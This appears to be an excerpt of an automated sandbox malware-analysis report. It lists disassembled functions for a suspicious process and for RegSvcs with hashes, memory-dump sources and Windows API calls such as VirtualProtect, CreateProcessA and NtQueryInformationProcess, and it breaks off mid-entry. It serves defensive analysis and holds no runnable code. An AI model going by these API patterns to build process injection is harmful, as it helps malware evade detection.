Opcode ID: f3ad70f81fd60729cb82d0c4cdf69d092161736d678e6960ae708d641236ccfd
Instruction ID: c720c2a6d6126847e2f75d217eed894ba9d170a0c5a338925f02b0109d88974b
Opcode Fuzzy Hash: f3ad70f81fd60729cb82d0c4cdf69d092161736d678e6960ae708d641236ccfd
Instruction Fuzzy Hash: D0F12B75A005198FCB04CFACC9889ADFBF6BF89711B1A846DE515AB361DB31EC81CB50

Function 017C7438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a95df967f1eae71a02262729dc145f52a1118fa3493fb026576cfe3165a8cea
Instruction ID: 6e6b2613c01e43de05e400970713b6a20e162dedc078f838837001f643c496c0
Opcode Fuzzy Hash: 4a95df967f1eae71a02262729dc145f52a1118fa3493fb026576cfe3165a8cea
Instruction Fuzzy Hash: 8471D3347002458FDB19DE2DD898AA9BBE6AF59B01B2540ADE906DB3B1DF70DC41CF90

Function 017CCEC7 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 940a176188e09f76ab47939c2f2e3701ba6136a2a675f9d88d670fe258fbcc19
Instruction ID: d36fa77f8355ad3ebb4ca5fe92568d614434deee6477e5690e242df8466393d2
Opcode Fuzzy Hash: 940a176188e09f76ab47939c2f2e3701ba6136a2a675f9d88d670fe258fbcc19
Instruction Fuzzy Hash: 0951BE3003125E8FD3282B20E9AE12ABFB5EF4F3677057E48F11F994699F3054958B65

Function 017CCED8 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9059a094b657052efa5f3e965b8dc771292a5b0735de479bb8b489ee53a5f97
Instruction ID: 8e276e8d649322522ff620c40c1c6ff92f0e4c01253af8f7f58ae4db3cfbb577
Opcode Fuzzy Hash: f9059a094b657052efa5f3e965b8dc771292a5b0735de479bb8b489ee53a5f97
Instruction Fuzzy Hash: 07519C3003125E8F93282B20EAAE12ABFB5FF4F7677057E08F11F954699F3164958B64

Function 017CCD10 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c55669be81e91b57b5b96596dc27176ef965c4bff7caf88bcc71addd71968a6
Instruction ID: 1342edabd1b77f8a894fdc91dec8334d0806c57ede60d2c726cc4cecf96dc63f
Opcode Fuzzy Hash: 7c55669be81e91b57b5b96596dc27176ef965c4bff7caf88bcc71addd71968a6
Instruction Fuzzy Hash: 60519F74E01208DFDB44DFA9D98499DFBF2BF89700F20916AE809AB364DB31A841CF50

Function 017C3908 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3e1c626ceabe3e2671e1afd2684419def110da711c377abe1399004cd5dede5
Instruction ID: 896d40154aa38d8fe9b5724bfc4941c7e0ceb5b8e30fb7c0eb82bb78ddda5dfa
Opcode Fuzzy Hash: a3e1c626ceabe3e2671e1afd2684419def110da711c377abe1399004cd5dede5
Instruction Fuzzy Hash: 09519074E01208CFCB08DFAAD59499DBBB2FF8D301B209069E805AB324DB35AD45CF50

Function 017C9A63 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a48911ca7c8c7345e011039c3f9508b1985c598fb3c992395f159b40f3b877cf
Instruction ID: c7f05f3b9aa47ab3bc888950982e5836193042a36f34c29a64be1bd3a8c0fc9c
Opcode Fuzzy Hash: a48911ca7c8c7345e011039c3f9508b1985c598fb3c992395f159b40f3b877cf
Instruction Fuzzy Hash: E0419231A04249DFCF56CFA8C844A9DFFB2AF49714F04859DEA159B2A2D335DA14CBA0

Function 017C4DC8 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1da5d3686de73c7eadc347ba6f4903d3be02e87e4aee3f0facfdc7be1f06e8a
Instruction ID: 839b9337f6cddcd42bb0f518d1fbe224c222ff2ac0a7080f665177ab41bd2679
Opcode Fuzzy Hash: d1da5d3686de73c7eadc347ba6f4903d3be02e87e4aee3f0facfdc7be1f06e8a
Instruction Fuzzy Hash: 0531603160410EAFDB069FA8E894AAE7FA7FB48700F14441CF91687390CB34DD61DBA0

Function 017C76D0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52e5db3deae2da9f1ac2c1697ea00bfa9ca1eabb1d005cb73654969d7027761a
Instruction ID: 28d9fc9c18f9bb0b20d8e82e374319397be6acb3422e2d94c2788240f3c62e55
Opcode Fuzzy Hash: 52e5db3deae2da9f1ac2c1697ea00bfa9ca1eabb1d005cb73654969d7027761a
Instruction Fuzzy Hash: 7A21F43530420D5BDB1E163D88D5A3DBA979FC4F58B1840ADDA06CB7A6EE29CC42DB81

Function 017CA809 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 058e8357224104b4d61044ac54653c270f30542e6a49f2570373a584e2b80217
Instruction ID: a8cfc35d22fc6f229b4f4a1bfe54f672fa7ed1bdc13adbac6c561c247b339797
Opcode Fuzzy Hash: 058e8357224104b4d61044ac54653c270f30542e6a49f2570373a584e2b80217
Instruction Fuzzy Hash: 5831AF75A006098FCB04CF6DC8859AEFBB7BF89B51B15816DE6159B3A1DB319C02CB90

Function 017C76E0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eca207fa850e73eafc1216467399cce7b8572a695b24854c6e5bda991f7d7ed
Instruction ID: a770ce6b91fb80d80ca5c367c7f266bde95939d429b2870d6a8ccdd5f4cccccf
Opcode Fuzzy Hash: 2eca207fa850e73eafc1216467399cce7b8572a695b24854c6e5bda991f7d7ed
Instruction Fuzzy Hash: 0F21D73531021D57EB1D16398894A7EBA9B9FC4F58F14807CE906CB795EE29CC42DB81

Function 017CD11F Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fc155b1bacb022d4471949c3304751926ea00f3a6bb3d1bf83929bed69d3359
Instruction ID: 5879f0c901ab0831d4afb6fa45ff346f526bb1333d035657767a6507a695d25e
Opcode Fuzzy Hash: 4fc155b1bacb022d4471949c3304751926ea00f3a6bb3d1bf83929bed69d3359
Instruction Fuzzy Hash: 7F314971C102098FCB10EFE8E9096ECFBB4FF9A301F119529D50477215E7305A8ACB80

Function 017C5A63 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6be2a64e6eb7efa592a6c06e1c2a26da2b928333dc914c8e2ae14c4cb767212
Instruction ID: a0a8579e629dcab0f8d522ca7d68859664e2c441c497f0ed90a9893055c54d65
Opcode Fuzzy Hash: b6be2a64e6eb7efa592a6c06e1c2a26da2b928333dc914c8e2ae14c4cb767212
Instruction Fuzzy Hash: 5121D1353016169BD3199A6AD89462EBFA3FF84B51B14416DE906CB394CE31EC02CBC0

Function 017C2060 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e6ea389b446b084854c6f5a0f77fceae9aed22cd5a3d244cfb4f9070e2ade76
Instruction ID: fa98f35dcab19dd03b65916893797bc3e616aa322d9f92a47187531c0e288551
Opcode Fuzzy Hash: 5e6ea389b446b084854c6f5a0f77fceae9aed22cd5a3d244cfb4f9070e2ade76
Instruction Fuzzy Hash: AF21E235A00206AFCB15DB28C5509AEB7B6EB8C750B10C05ED8098B259DB35EE82CBC1

Function 017CD218 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08b5c2500f0110f5897ca5e59cfa06863a8a22e99ababeed960332a86eeeff47
Instruction ID: fa8b00f5c63dd9ff3ac7d2ebd5eec9259b464db9ae3185f204a91a934ddc3a71
Opcode Fuzzy Hash: 08b5c2500f0110f5897ca5e59cfa06863a8a22e99ababeed960332a86eeeff47
Instruction Fuzzy Hash: B42107349412088FDB18DFB5E841AEDBBB2FB8A310F10A46DD905773A0DB399946CF64

Function 017C215C Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 749dd8a81158e1bac9bd1d3197a0804722e3923f419bec4b7791c9769d651300
Instruction ID: cb55ee7e2c5a97ae746138f29b7314883abbf74e7c736c4d9227ef7760a58a9b
Opcode Fuzzy Hash: 749dd8a81158e1bac9bd1d3197a0804722e3923f419bec4b7791c9769d651300
Instruction Fuzzy Hash: EF117F35E043599FCB029BB89C108DEFB31FF8A310725879BD666B7092E9311846C361

Function 017CD228 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 670f7d6c33ab19ee97ac019b51f2042843ffa8cdaec504d30ad657915e227a5c
Instruction ID: fa44fd6443035f595a8c68ece0e287c5c033fb41c0942b56b4d1a11f9b7bf423
Opcode Fuzzy Hash: 670f7d6c33ab19ee97ac019b51f2042843ffa8cdaec504d30ad657915e227a5c
Instruction Fuzzy Hash: 1B21E434A412088FDF08DFB5D940AEEB7B2FB8A310F10A429D805773A4DB39A945CF64

Function 017C5A70 Relevance: .1, Instructions: 59COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04100c2b50a60f2e1aa443a34003fdf6ae77ca6e05c2918cf8df1752334269c3
Instruction ID: 1b27feec1b99a8c3a6482c67138c9445ebe764848e277f5d54ab1fa3c9ced2c9
Opcode Fuzzy Hash: 04100c2b50a60f2e1aa443a34003fdf6ae77ca6e05c2918cf8df1752334269c3
Instruction Fuzzy Hash: A8115E3570161A9FD7199A2ED89492EBFA6FF84B6171941ACE906CB350DF31EC028BD0

Function 017C5607 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 299d2355cac5298f5c8a7f7b6c22925fa69d0e5fed409ef675585b1c6832e6bf
Instruction ID: d8c398099f7fe0a9bb4baaeea86c928c55c2b7e1a124bc0196b29a14b0c6ac16
Opcode Fuzzy Hash: 299d2355cac5298f5c8a7f7b6c22925fa69d0e5fed409ef675585b1c6832e6bf
Instruction Fuzzy Hash: D3012B317041095FCB068E54A8006AEBFA7DBD9B40B18806EF504D7280CE31C802C7A1

Function 017C1F61 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d924f8df39811f9d01d65df6674866f930bccc673dce0c0c14883b808aa12fb
Instruction ID: bd2bb35848fd61e1278f4d76be96cfc65f57c63379be4a82f65a9c8b9ddc9553
Opcode Fuzzy Hash: 3d924f8df39811f9d01d65df6674866f930bccc673dce0c0c14883b808aa12fb
Instruction Fuzzy Hash: 49219EB4D1520E8FCB44EFA8D9495EEBFF1BB49311F10516AD909B3210EB305A85CFA1

Function 017C1F08 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c7092df72ceacd51ea27290d38ffe7d4ce3d3e6528a95dd058baeb934ee1552
Instruction ID: 2c31de1060316c1fa00aab89e223ffc3277b24dbe37ab7e4dcbe8df709580b85
Opcode Fuzzy Hash: 1c7092df72ceacd51ea27290d38ffe7d4ce3d3e6528a95dd058baeb934ee1552
Instruction Fuzzy Hash: 0511E2B4C1120E8FCB05DFA8D9494EEBFB0BF49310F10516AE805B7260EB305A85CBA1

Function 017C2010 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8478bdc8a2472fadda95fcc14021e6c6ca6411c572fa047bffaab86dce915ff
Instruction ID: ef76cb2690d7b7c82d4b8c4a605206ac979bd9be58a5d6d9dd604c310f1091f1
Opcode Fuzzy Hash: f8478bdc8a2472fadda95fcc14021e6c6ca6411c572fa047bffaab86dce915ff
Instruction Fuzzy Hash: 94E07D76D2032792CB00D7E0ED095FDB734AFA2213F065613D02037081FB70150A8291

Function 017C2020 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fad2dad0e5e812bd6a3e75a6ab7a257f14178101ccd99f4b7258699d28ef9dc
Instruction ID: 65796c6b09c89dcb44715985316754312f8fafbe344ea9273c532254887c604a
Opcode Fuzzy Hash: 8fad2dad0e5e812bd6a3e75a6ab7a257f14178101ccd99f4b7258699d28ef9dc
Instruction Fuzzy Hash: 17D05B31D2022B57CB10E7A5DC044EFF738FED6262B544626D51437154FB702659C6E1

Function 017C8258 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 340b5a7ad2249b9a2f0a79f733667ecf5db4a7fc490b1e815c9e017235a9e1eb
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: A6C0123320C5282AA725108EBC44AA7AB8CC2C1BB4A25027FF91CA3200A8429C8001AA

Function 017CA70D Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 431de2d2fa976e7c0e4ca4b3bdf3f99e8900eb6ce8c956c1ba3db3312719d78d
Instruction ID: 4b3ab13c1550ffcfc021b18d3f59866e46605481633d26ba609e5c9e562c1d82
Opcode Fuzzy Hash: 431de2d2fa976e7c0e4ca4b3bdf3f99e8900eb6ce8c956c1ba3db3312719d78d
Instruction Fuzzy Hash: 95D0677AB510189FCB049F98EC808DDBBB6FB9C221B048116FA25A3261C6319921DB50

Function 017C5EA8 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bee85ebfa769335cd8ca68f72a470495808b9c12fa9fd4dc213aa112b2e4fafe
Instruction ID: 6517fd646f8617225425d8e74b42afac5da06e7a12b950f1056b402aaed97686
Opcode Fuzzy Hash: bee85ebfa769335cd8ca68f72a470495808b9c12fa9fd4dc213aa112b2e4fafe
Instruction Fuzzy Hash: 87D05EB181834406D31AEA71FD920183B27AB90605B98599DB8154A756EA684D889266

Function 017C5EB8 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ac1424c6ecab88ebbbcfd2956274eb1c9bd5524ab461650cd2a751c62f96f36
Instruction ID: eb1556d10bdb999da097e4fa561b6c92e30df8abcedb8dd899a47098e388029e
Opcode Fuzzy Hash: 8ac1424c6ecab88ebbbcfd2956274eb1c9bd5524ab461650cd2a751c62f96f36
Instruction Fuzzy Hash: CFC0127011430E47C649E776FD855193B2BF7C0700F506918B4190A255EE785CC45695

Non-executed Functions

Function 017C6088 Relevance: 5.0, Strings: 4, Instructions: 49COMMON

Download Yara Rule

Strings

\;dq, xrefs: 017C609E
\;dq, xrefs: 017C60BA
\;dq, xrefs: 017C6094
\;dq, xrefs: 017C60C6

Memory Dump Source

Source File: 00000006.00000002.1823848605.00000000017C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_17c0000_RegSvcs.jbxd

Similarity

API ID:
String ID: \;dq$\;dq$\;dq$\;dq
API String ID: 0-1855092343
Opcode ID: 9bdfb9ec902291d9b99b603f4e953840d2335744622b826ca447e08e260afa47
Instruction ID: fdc6fc94ba940729324a8ffafb5fbb34c90b850e841cde8fcf611a2446ef7668
Opcode Fuzzy Hash: 9bdfb9ec902291d9b99b603f4e953840d2335744622b826ca447e08e260afa47
Instruction Fuzzy Hash: 820171317140248FCB258E2DC4C4E26B7F6AF98BA471541BEF601DB3B1DA71DC828751

Analysis Process: NPadpxkCGKGoat.exePID: 7236, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	13.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	295
Total number of Limit Nodes:	19

Executed Functions

Function 02560814 Relevance: 1.6, APIs: 1, Instructions: 103nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 02569CE5

Memory Dump Source

Source File: 00000008.00000002.1782604788.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2560000_NPadpxkCGKGoat.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: d758c33d54bc604ac1c8cba79a8be1abb4aebec8d5d92be6821535d0c5ac68c4
Instruction ID: 39d55dd8f73b115fe4056bae72538360285e09bd8703aef5a755b75c2cbcc434
Opcode Fuzzy Hash: d758c33d54bc604ac1c8cba79a8be1abb4aebec8d5d92be6821535d0c5ac68c4
Instruction Fuzzy Hash: 674165B9D042589FCF10CFA9D984A9EFBF5BB19310F10A02AE918B7310D375A905CF68

Function 02569C29 Relevance: 1.6, APIs: 1, Instructions: 101nativeCOMMON

Download Yara Rule

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 02569CE5

Memory Dump Source

Source File: 00000008.00000002.1782604788.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2560000_NPadpxkCGKGoat.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: 87037a7c3f797dd3be4699b76db6ff3c9b7fb6455fe5f6822124c154290f7775
Instruction ID: ce0390b59cde31db78ee8d7652ab3e00d363dce3eb749c1a19d437643a7ba0e7
Opcode Fuzzy Hash: 87037a7c3f797dd3be4699b76db6ff3c9b7fb6455fe5f6822124c154290f7775
Instruction Fuzzy Hash: 924166B9D00258DFCF10CFA9D984A9EFBB1BB59310F20A02AE918B7310D335A905CF64

Function 04C88448 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04C884D6
GetCurrentThread.KERNEL32 ref: 04C88513
GetCurrentProcess.KERNEL32 ref: 04C88550
GetCurrentThreadId.KERNEL32 ref: 04C885A9

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d068315804e6c75f72facf3a64c70e62d21ad1c0b7e39538da25d9db94d9a8cf
Instruction ID: 551bc86da628f9ca66594ed9ffd1f0d68f2628d173c3a5302bcb0d6eab410d8d
Opcode Fuzzy Hash: d068315804e6c75f72facf3a64c70e62d21ad1c0b7e39538da25d9db94d9a8cf
Instruction Fuzzy Hash: 6B5147B49002098FEB14EFA9D648B9EBFF6EF88314F24845DE409A7350D774A944CF66

Function 04C88458 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 04C884D6
GetCurrentThread.KERNEL32 ref: 04C88513
GetCurrentProcess.KERNEL32 ref: 04C88550
GetCurrentThreadId.KERNEL32 ref: 04C885A9

Memory Dump Source

Source File: 00000008.00000002.1786826618.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4c80000_NPadpxkCGKGoat.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 50a87b944dc74c8062ed100b01166e81256772ab77cf9c9e7e9b72ede86b1653
Instruction ID: 8a0cf4aa5a1dbeee8dc3115f9cfdd347e226f5a200d40265c8638cd436f6c6f8
Opcode Fuzzy Hash: 50a87b944dc74c8062ed100b01166e81256772ab77cf9c9e7e9b72ede86b1653
Instruction Fuzzy Hash: B65157B49002098FEB14EFAAD548B9EBFF2EF88314F24845DE409A7350D774A944CF66

Function 025680D0 Relevance: 1.9, APIs: 1, Instructions: 436memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0256843F

Memory Dump Source

Source File: 00000008.00000002.1782604788.0000000002560000.00000040.00000800.00020000.00000000.sdmp, Offset: 02560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2560000_NPadpxkCGKGoat.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: aab589a483a4cef060a429ba22589f18ce79e2fe8cfbdce08362c9d634fd570a
Instruction ID: cbbe94160fc00f6ebec510434825ab9b98dfb201395d5ecdcdc0528dc0e1e314
Opcode Fuzzy Hash: aab589a483a4cef060a429ba22589f18ce79e2fe8cfbdce08362c9d634fd570a
Instruction Fuzzy Hash: 3BE197629495D46FDB12CB788CBDAFBBFF5BE57228B1C40D9E4D017112F221940AC7A8

Function 09B16E6C Relevance: 1.8, APIs: 1, Instructions: 323processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09B1713F

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: f1e816546846f9222077d928b36eb83b1865cad0fde42dc9a0af184b0bcf9015
Instruction ID: 84e08a2f3fae5781b13412cf38de41e4354dcf31ed40ad8ccd63844324cbc4a9
Opcode Fuzzy Hash: f1e816546846f9222077d928b36eb83b1865cad0fde42dc9a0af184b0bcf9015
Instruction Fuzzy Hash: 0DC1F270D002198FDF24CFA8C881BEEBBB1FB49310F0095A9E819B7250DB749A85CF95

Function 09B16E78 Relevance: 1.8, APIs: 1, Instructions: 321processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 09B1713F

Memory Dump Source

Source File: 00000008.00000002.1789450802.0000000009B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 09B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9b10000_NPadpxkCGKGoat.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: e297ebe0e0c849a33b5d997b1c751e8a5a0bc2eaaa0202e67e7cc5075dd3c082
Instruction ID: 7fd3168dc93c4cb9a6b702d01c9c9c58b9e94b6297efc65949f84ef0282bbeb7
Opcode Fuzzy Hash: e297ebe0e0c849a33b5d997b1c751e8a5a0bc2eaaa0202e67e7cc5075dd3c082
Instruction Fuzzy Hash: E2C1E271D002198FDF24CFA8C881BEEBBB1FB49310F0095A9E819B7250DB749A85CF95

Function 04C86088 Relevance: 1.7, APIs: 1, Instructions: 227COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(?), ref: 04C8630A

Memory Dump Source

